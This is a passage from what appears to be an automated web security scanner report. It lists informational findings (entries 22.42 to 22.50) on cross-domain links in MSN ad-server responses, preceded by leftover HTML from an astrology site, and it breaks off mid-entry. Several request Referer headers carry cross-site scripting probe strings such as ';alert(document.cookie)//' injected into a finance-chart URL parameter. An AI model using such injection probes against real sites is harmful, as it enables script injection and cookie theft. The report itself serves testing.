       <td style="padding-left:10px"><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Theme=Love&Af=-1000" class="prodTitle">Psychic Love Reading</a><br><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Theme=Love&Af=-1000" class="prodDesc">
       A fabulous complement to any of our love products. Find out what the psychics see for your love future.</a>
...[SNIP]...
<div style="text-align:right;"><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Theme=Love&Af=-1000" class="prodClick">More</a>
...[SNIP]...
<td class="headMod">What is <a target="phoneSite" class="standardL11" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000"><b>
...[SNIP]...
</div>
           1-866-MY-ASTRO is Astrocenter's live advice phone service, which is committed to making quality <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic reading</a>
...[SNIP]...
<br>
           
           Our advisors are highly skilled <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychics</a>
...[SNIP]...
<b>Why <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000" style="color:#FF9944; text-decoration:none">psychic reading</a>
...[SNIP]...
<br>
           Calling a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic</a> advisor for the first time can be overwhelming. Please see below how you may benefit from a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic reading</a>
...[SNIP]...
<br>
           When it comes to love, sometimes we need support to keep going. Whether you are used to turn to astrology or the Tarot for advice, or prefer a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic</a>
...[SNIP]...
<br>
           Feel fenced in to reach your career potential? our advisors have experience in many fields and their goal is to share their insight. Contact an Astrocenter <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic</a> and see what a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic reading</a>
...[SNIP]...
<b><a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000" style="color:#FF9944; text-decoration:none">Tarot reading</a>
...[SNIP]...
<br>
           <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">A Tarot reading</a>
...[SNIP]...
<br>
           Whatever your particular question or personal situation, there's an Astrocenter <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic</a> to guide you. Some <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychics</a>
...[SNIP]...
</a>. Understand how you can use the powerful influences in your life and experience a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic reading</a>
...[SNIP]...
<br>
   It's FREE! Get it <a href="http://www.adobe.com/" target="adobeUpgrade"><u>
...[SNIP]...
<noscript>
   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="300" height="250" id="hMod" align="middle">
   <param name="allowScriptAccess" value="always" />
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><a href="http://www.bing.com/search?FORM=A1&amp;q=summer+sandals+2010&amp;src=IE-SearchBox" class="T11TahBk">Search: Summer Sandals</a>
...[SNIP]...
<td width="80" style="padding-left:10px;padding-right:10px;"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdEm&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_misc/pict_StEdFreeEmailSub_70.png" width="70" height="70" border="0" title="Free Horoscope and Tarot Newsletters" alt="Free Horoscope and Tarot Newsletters"></a>
...[SNIP]...
<td width="80" style="padding-right:5px;padding-top:8px;" valign="top">
           ..&nbsp;<a target=_blank href="http://www.astrocenter.com/us/PrivacyPopup.aspx" class="prodClick" title="Astrocenter's Privacy Policy">Privacy</a>
...[SNIP]...
<div class="afwrapper standard11"><a href="//privacy-policy.truste.com/click-with-confidence/eusafe/en/www.astrocenter.com/seal_s" title="TRUSTe European Safe Harbor certification" target="_blank"><img align="right" style="border: none; margin-top: -10px" src="//privacy-policy.truste.com/certified-seal/eusafe/en/www.astrocenter.com/seal_s.png" alt="TRUSTe European Safe Harbor certification"/></a>
...[SNIP]...
</a> | <a class="standardL11" href="http://www.horoscope.com"><font color=black>
...[SNIP]...
</a> content Copyright 1999-2011 <a class="standardL11" href="http://www.horoscope.com"><font color=black>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<!-- Vibrant/Bing -->
<script type="text/javascript" src="http://astrocenter.msn.us.intellitxt.com/ast/js/msn/astrocenter.msn_cs.js"></script>
...[SNIP]...

22.42. http://b.rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QC&AP=1026 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2798
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8013955-T8303500-C31000000000039414
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:59:06 GMT
Content-Length: 2798


//<![CDATA[
function getRADIds() { return{"adid":"31000000000039414","pid":"8013955","targetid":"8303500"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);if(parent
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1510162801() {var adCode_1510162801=new Array();adCode_1510162801.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003H/31000000000039414.1?!&amp;&amp;PID=8013955&amp;UIT=G&amp;TargetID=8303500&amp;AN=1510162801&amp;PG=INV4QC&amp;ASID=be19561f6d894cfbb5798e8f4be61980&destination=;ord=1510162801?" WIDTH=120 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_1510162801.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.no_url_specifiedOX2487/B5076164.3;abr=!ie;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http
...[SNIP]...

22.43. http://b.rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QC&AP=1026 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; FC02=FB=AgEAYQ4UwAwC; FC00=FB=AgEAYQ6guQgB; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2781
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8013955-T8303500-C31000000000039414
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 19:28:48 GMT
Content-Length: 2781


//<![CDATA[
function getRADIds() { return{"adid":"31000000000039414","pid":"8013955","targetid":"8303500"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);if(parent
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_439566566() {var adCode_439566566=new Array();adCode_439566566.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003H/31000000000039414.1?!&amp;&amp;PID=8013955&amp;UIT=G&amp;TargetID=8303500&amp;AN=439566566&amp;PG=INV4QC&amp;ASID=b03116286f514a64b079940948ad7d98&destination=;ord=439566566?" WIDTH=120 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_439566566.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.no_url_specifiedOX2487/B5076164.3;abr=!ie;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http:
...[SNIP]...

22.44. http://b.rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVPC3&AP=1455 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2710
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8016549-T28253486-C26000000000150232
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 14:48:49 GMT
Content-Length: 2710


//<![CDATA[
function getRADIds() { return{"adid":"26000000000150232","pid":"8016549","targetid":"28253486"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 60);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_287916340() {var adCode_287916340=new Array();adCode_287916340.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&amp;&amp;PID=8016549&amp;UIT=G&amp;TargetID=28253486&amp;AN=287916340&amp;PG=INVPC3&amp;ASID=7dc979ca792841188b3b7d4266939e9d&destination=;ord=287916340?" WIDTH=300 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_287916340.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3973.MSN/B4412732.159;abr=!ie;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.
...[SNIP]...

22.45. http://b.rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&PG=INV4QA&AP=1026 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 756
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8031597-T8247108-C48000000000031630
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:59:17 GMT
Content-Length: 756


//<![CDATA[
function getRADIds() { return{"adid":"48000000000031630","pid":"8031597","targetid":"8247108"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);}
tr
...[SNIP]...
<a href="http://g.redacted/2AD0003L/48000000000031630.1??PID=8031597&amp;UIT=G&amp;TargetID=8247108&amp;AN=1930038004&amp;PG=INV4QA&amp;ASID=0dce4f5c66d64ff89775ccb372e6427b" target="_blank"><img src="http://b.ads2.msads.net/CIS/29/000/000/000/004/822.gif" width="120" height="60" alt="Click Here!" border="0" /></a>
...[SNIP]...

22.46. http://b.rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVPC3&AP=1455 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2676
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8016549-T28253486-C26000000000150232
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 19:28:47 GMT
Content-Length: 2676


//<![CDATA[
function getRADIds() { return{"adid":"26000000000150232","pid":"8016549","targetid":"28253486"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 60);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_2295886() {var adCode_2295886=new Array();adCode_2295886.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&amp;&amp;PID=8016549&amp;UIT=G&amp;TargetID=28253486&amp;AN=2295886&amp;PG=INVPC3&amp;ASID=ec815e38b41240648384113dab579c42&destination=;ord=2295886?" WIDTH=300 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_2295886.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3973.MSN/B4412732.159;abr=!ie;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.ms
...[SNIP]...

22.47. http://b.rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QC&AP=1026 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; FC02=FB=AgEAYQ4UwAwC; FC00=FB=AgEAYQ6guQgB; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2781
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8013955-T8303500-C31000000000039414
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 14:48:54 GMT
Content-Length: 2781


//<![CDATA[
function getRADIds() { return{"adid":"31000000000039414","pid":"8013955","targetid":"8303500"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);if(parent
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_405471394() {var adCode_405471394=new Array();adCode_405471394.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003H/31000000000039414.1?!&amp;&amp;PID=8013955&amp;UIT=G&amp;TargetID=8303500&amp;AN=405471394&amp;PG=INV4QC&amp;ASID=f139fe743c0d4e72bb5ed3de5387bb68&destination=;ord=405471394?" WIDTH=120 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_405471394.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.no_url_specifiedOX2487/B5076164.3;abr=!ie;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http:
...[SNIP]...

22.48. http://b.rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&PG=INVIHP&AP=1089 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2407
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC00=FB=AgEAYQ6guQgB; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
X-RADID: P8128603-T38305882-C117000000000038318
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 13:00:28 GMT
Content-Length: 2407


//<![CDATA[
function getRADIds() { return{"adid":"117000000000038318","pid":"8128603","targetid":"38305882"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(par
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_456655314() {var adCode_456655314=new Array();adCode_456655314.push('<iframe src="http://view.atdmt.com/NYC/iview/264935949/direct;;wi.300;hi.250/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">\n');adCode_456655314.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_456655314.push('document.write(\'<a href="http://clk.atdmt.com/NYC/go/264935949/direct;;wi.300;hi.250/01/" target="_blank"><img src="http://view.atdmt.com/NYC/view/264935949/direct;;wi.300;hi.250/01/"/></a>
...[SNIP]...

22.49. http://b.rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&PG=INV4QB&AP=1026 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 754
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8085302-T8295071-C43000000000032622
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 13:00:22 GMT
Content-Length: 754


//<![CDATA[
function getRADIds() { return{"adid":"43000000000032622","pid":"8085302","targetid":"8295071"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);}
tr
...[SNIP]...
<a href="http://g.redacted/2AD0003I/43000000000032622.1??PID=8085302&amp;UIT=G&amp;TargetID=8295071&amp;AN=571491259&amp;PG=INV4QB&amp;ASID=592d82eb9bba4dddb5a4cf074ddba79c" target="_blank"><img src="http://b.ads2.msads.net/CIS/75/000/000/000/011/300.gif" width="120" height="60" alt="click here" border="0" /></a>
...[SNIP]...

22.50. http://b.rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

